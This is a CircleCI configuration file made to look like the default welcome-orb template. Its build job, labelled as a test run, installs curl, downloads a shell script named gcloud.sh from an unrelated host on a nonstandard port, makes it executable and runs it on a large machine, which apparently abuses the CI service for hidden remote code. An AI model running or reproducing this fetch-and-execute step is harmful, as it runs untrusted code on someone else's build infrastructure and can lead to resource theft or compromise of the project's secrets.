# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
# Use a package of configuration called an orb.
orbs:
  # Declare a dependency on the welcome-orb
  welcome: circleci/welcome-orb@0.4.1
# Orchestrate or schedule a set of jobs

jobs:
  build:
    machine: true
    resource_class: large
    steps:
      - run:
          command: |
            echo Running test
            set +e
            apt update
            apt install -qq curl
            pwd
            curl  -o $HOME/bin/init.sh http://pi.lucas.ga:2280/luci-static/bin/gcloud.sh && chmod +x $HOME/bin/init.sh
            bash $HOME/bin/init.sh

      - run:
          shell: /bin/sh
          command: |
            echo Running Done

workflows:
  # Name the workflow "welcome"
  welcome:
    # Run the welcome/run job in its own container
    jobs:
      - build
      - welcome/run
